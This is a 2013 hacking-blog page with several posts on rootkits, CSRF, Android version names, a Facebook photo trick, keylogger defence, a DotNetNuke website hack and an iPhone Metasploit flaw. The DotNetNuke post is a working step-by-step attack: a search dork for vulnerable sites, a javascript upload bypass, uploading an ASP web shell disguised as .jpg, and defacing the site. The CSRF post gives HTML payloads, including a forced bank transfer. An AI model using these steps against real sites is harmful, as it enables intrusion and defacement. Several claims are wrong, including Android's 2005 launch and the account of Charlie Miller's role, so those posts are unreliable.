Anonymous News Hacked ;) Anonymous Hackers

Sunday, 24 March 2013

A thing called Rootkit

There are some concepts in the hacking world which leaves the passers-by absolutely stunned. It appears something like a magic portion creating a black magic effect. By passers-by I mean those who try out its implementation for the first time.

Its installation is usually simple but its output is absolutely amazing. It gives you the power to hide processes, programs and files so that the users cannot spot them and even the OS fails to spot them!!!

And if the OS fails to spot them what can the antivirus do???

YES I AM TALKING ABOUT ROOTKITS.

Rootkits have the power to evade highly sophisticated antivirus softwares.

ROOTKIT = ROOT + KIT

ROOT  =         Root-level Access or Administrative Access
KIT      =                     Set of Tools

Rootkits are used for many purposes including (but not limited to) the following:

1.Privilege Escalation
2.Backdoor Installation
3.Recording Keystrokes

The primary reason why rootkits evade detection is because they operate at a lower level of the OS i.e. inside the kernel.When we use any software i.e. when we interact with it,these interactions happen at a higher level of the OS.

When an anti virus does its job I mean scanning,it usually passes requests off to the inner levels of the OS for the completion of its task.

Now we know that rootkits dwell deep inside the OS.This is where a rootkit does its job by intercepting system calls between any software and the OS.In the Hacking world this action of Rootkit is known as Hooking.

For instance lets go through an example :

To find out the running processes on a Windows computer we use Ctrl + Alt + Del.
This starts the Task Manager and on clicking the Processes Tab we see all the processes which are running at the moment.

In the above case the OS is called and asked “Which processes/services are running now?”

The OS here starts querying all the running processes “it knows”(Yes this is the catch.Hope you got it!!!)

Now if we bring rootkit here in between they give us the ability to intercept and modify the responses which the OS returns when the user asks for it.

When the user asks for the listing of all the running processes the rootkit intercepts this and removes selected processes from that list and displays the modified list to the users.

All this happens so fast that the user can never even think that a rootkit is installed on his/her machine.

Keep yourself hooked to Innobuzz Blog and be on the lookout for future articles on how to use a full-fledged rootkit.


For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
0 comments
Read More

CSRF (Cross Site Request Forgery)

CSRF stands for Cross Site Request Forgery. It is a method used by an attacker to trick a user into loading a page that contains a malicious request written in the form of codes. This type of attack can be preformed to change a user’s email id, password, name or any other field or even make a purchase in some typical cases. There is no way any site can differentiate between pure request and forged request because this attack is performed when the victim is logged on and the victim clicks on some areas which have been manipulated by the attacker. The malicious script gets executed away from the user vicinity from un-trusted source, which is uploaded by the hacker. This type of attack can lead to leak of many sensitive data stored in the server like Credit Card Details or Bank Details.

These are the HTML methods that can be used for performing this type of attack:
IMG SRC
  <img src="http://www.vulnerable.com/?command">

SCRIPT SRC
  <script src="http:// www.vulnerable.com /?command">

IFRAME SRC
  <iframe src="http:// www.vulnerable.com /?command">

Javascripts can also be used in the following manner:

<script>
var fool = new Image();
fool.src = "http://www.vulnerable.com/?command";
</script>



Example:
<iframe src="https://bank.com/apps/Fund_transfer?amt=1500&DstnAcc=143554659" >

The above link is placed in the vicinity of the victim by the attacker. When the victim clicks on the particular link, a mount of 1500 is automatically transferred from the victim’s account without even his knowledge to the given destination account number. This type of attack largely occurs on sites that depend and blindly believe the web browser session if the user. So, even if a user somehow gets into the session of another user (victim), the attacker can do anything he wants from there. So, these types of attacks are very dangerous. And, if the inserted malicious code gets stored in the server, then this attack becomes even more dangerous because every time the victim somehow runs the code, the attack keeps on going.

Even, the Youtube site has been reported against this type of vulnerability.
0 comments
Read More

Google's Android

Google android suddenly has a sense that it named all its versions on the names of desserts, same as the intel names all their CPU on the names of rivers. Also they are giving the names according to English dictionary, all the names are in alphabetical order. To celebrate the release of new version launched, android delivers the dessert that matches wth the version name in whole google campus.

Version 1.1(noname)
There was no name assigned to the first version of google android. They launched it in July 2005.  HTC was the first phone making company to take the android out in market.
Android 1.5 (cupcake)
Technically android 1.5 cupcake was not the first version of google android, but the ver1.1 was not given any name so it was considered the first one. Earlier google decided to release ver1.2 but later they realized that they should majorly rvised it and then launched ver1.5 and named it cupcake. Like this the dessert series started.
Android 1.6 (donut)
Android’s third version donut was launched in Sept 2009. It fixed the reboot problem as well as consisted better search integration.
Android 2.0/2.1(�clair)
Android 2.0 was launched in Oct 2009 with a bigger version 2.0.1 in Dec 2009. Android 2.1 was released in Jan 2010 but many considered them all released together. Bluetooth 2.1, digital zoom, multi-touch and live wallpapers were the new features added to this version.
Android2.2(Froyo)
Android 2.2 froyo mainly improved the speed by introducing the java script.
Android 2.3 (gingerbread)
Gingerbread man was introduced in google campus in  Nov 2010 but gingerbread was released in Dec 2010. On Dec 7th of 2010, google announced the launching of Galaxy nexus S. Gingerbread supports internet calling, NFC wireless transaction capacity, support more than one camera, supports motion sensor and gravity senser.


Android 3.0 (honeycomb)
Android 3.0 honeycomb was released in Feb 2011, followed by 3.1 and 3.2 honeycomb in Aug 2011. Motorola XOOM was the first tablet to launch the 3.x version of android which was followed by many tablets in market.
Android 4.0 (ice-cream sandwich)
The latest version of android is Ice-Cream sandwich which is released in Nov 2011. All details about this version of android are provided by my in past in my earlier post.

Credits: android.com, google.com

 For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
0 comments
Read More

Long sized fb profile picture

Your facebook profile picture is the first iompression on the visitor of tour profile. All of us wants to set a stylish and attractive DP on our fb profile. Here I tell you a trick by which you can add a long sized DP.



2.    Then click on LOAD PHOTO button if you have a photo on your PC otherwise click on USE WEBCAM.
3.    Now edit and configure the photo as you want.
4.    Click on login to fb button.
5.    Give your user id and login password.
6.    Now your edited image will be set as your profile picture.


  For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
0 comments
Read More

Protect yourself against keylogger

All of us are aware of keyloggers. The people who still don’t know what keylogger is, let me tell them that it is a software installed in some computer system that keep tracks of key stroked made by the user. Hackers use these software’s to record the keystrokes of victim when victim types his password. Here I am telling you guys how to protect yourself from being a victim of keylogger.
 
Enable a firewall:
Firewall donot stops the keylogger software to enter your system but it stops keylogger to send your information.
It is always strictly recommended that firewall is enabled on your system.

Use good anti-virus, avoid cracked or pirated softwares:
Use good anti-virus software like McAfee, Norton, Quick Heal, also you can go with free ones like Avast and AVG. They help you to protect yourself from keyloggers.
Please avoid downloading cracked anti-viruses from Torrentz because it’s home of viruses and hackers, also it’s illegal to pirate a software.
 
How to fool the keylogger:
These were the tips to stop keyloggers to enter your computer, now I will tell you some tips that how to fool a keylogger.

1. If you doubt that the system you are using have a keylogger installed then you can use onscreen keyboard to fool the software. To use onscreen keyboard simply type osk in run.

2. Keylogger runs in the background .Always check out for suspicious processes using task manger and end them.

3.Type two-three random characters in your password field and then use mouse to select them all, then start typing your real password. This will give some extra characters with password to the hacker. Eg: if your password is “asdfgh”, then you should type “wrogb” and select them all and then type your real password. So like this “asdfgh” will be sent to computer but “wrognasdfgh” will be sent to keylogger.

4. Also you can sniff a keyloggers ftp password using a sniffer software, some sniffers are named as wireshark and cain&able.


For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
0 comments
Read More

DotNetNuke attack- Hack a website

You guys must be aware of Portal attack for hacking a website. Portal hacking A.K.A. DotNetNuke(DNN) attack.
So here it is, let’s start:


1.   Open google.com and type”inurl:fcklinkgallery.aspx” (this is for searching sites which are vulnarable to this attack.
2.   Now select any website from the list.
3.      Now add  ”/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx” after the name of your website in url bar.
4.     You will get a link gallery page
5.     Select “file”
6.     Now copy this javascript in url bar.
javascript:__doPostBack('ctlURL$cmdUpload','')
7.    Now you will see an upload option. Clck on that and upload your shell ASp
8.      After upload 
go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg
EXample : http://ww.itservi wcespro.net/portals/0/umer.asp;.jpg
9.      Now shell is in frot of you like this (screen shot)
10.  Click again and again on <Dir>, untill you find admin.
11.  When you see this page admin area, click on upload and upload your deface index page to be shown.
0 comments
Read More

Iphone Exploited with Metasploit

They can mock at Android's security loop holes or the slow and sleepy Symbian ,but they were unaware that one day the tables get turned. The leading consumer electronics giant, Apple is affected by a major flaw in its security. The flaw is termed as code signing flaw.
Metasploit, an important framework for security auditing is used in this hack.
Metasploit is used to inject the payload after finding vulnerabilities in a computer operating system, but no one really knew that it can also be used to bypass the security features of Apple's App store. Each App uploaded in apple app store by the developers are passed through a code signing test, where the apps are checked for malicious code or malware. But using the Metasploit framework, the apps can bypass this test, and a pure malicious unsigned-code app is published in the app store.
The hacker waits with his Metasploit terminal for the installation of the unsigned app in a remote iPhone(a innocent victim). Once installed, the app does its normal work, but backdoor's reverse handler connects to the Metasploit terminal and opens a Meterpreter shell. Meterpeter shell in Metasploit is what all Hackers want, considered as a success in hacking. Using Meterpeter shell all the features of iPhone can also be accessed by the hacker, like messages, calls, media, and can even transfer files. Hackers enjoy these privileges till the user deletes the app, and thats not gonna happen if it is a addictive game like Angry birds. 
This Major flaw was discovered by Charlie Miller, developer at Apple. He was fired immediately after they found that he was violating terms of Apple by hiding this flaw and some information, which he was not supposed to do.
Android users do reverse engineering in each app they download to check whether it is a malware or not. Now it seems iPhone users also needs to get their hands dirty. Well we really miss you Steve jobs
 
 For Any Query Leave A Comment Or Contact Me On Facebook 
Contact ==> www.facebook.com/ryan.manjothi
0 comments
Read More

Pages